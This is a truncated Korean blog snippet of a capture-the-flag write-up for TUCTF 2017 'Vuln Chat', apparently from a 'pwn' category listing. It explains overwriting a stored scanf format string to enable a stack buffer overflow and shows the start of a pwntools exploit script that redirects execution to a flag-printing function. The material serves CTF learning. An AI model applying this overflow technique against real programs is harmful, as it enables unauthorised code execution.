목록pwn (1)
Parkchanjin
TUCTF 2017 Vuln Chat1, 2
- Vuln Chat1.0 - 위 사진을 보시면 %30s을 변수에 저장해서 scanf함수로 30글자까지 입력을 받습니다.30글자만 입력받으면 bof를 못하는데 다행히도 %30s를 변수에 따로 저장해놓고 사용해서 Username을 입력받을 때 format변수를 %100s이든 다른걸로덮어씌우면 됩니다. 123456789101112from pwn import * username = "a" * 17 + "\x00\x50\xfb\x25" + "\x33\x30\x30\x73" # %s300chat = "a" * 49 + "\x6b\x85\x04\x08" # printflag p = process('./chat') print p.recvuntil('Enter your username: ')p.sendline(user..
pwn
2017. 11. 30. 21:37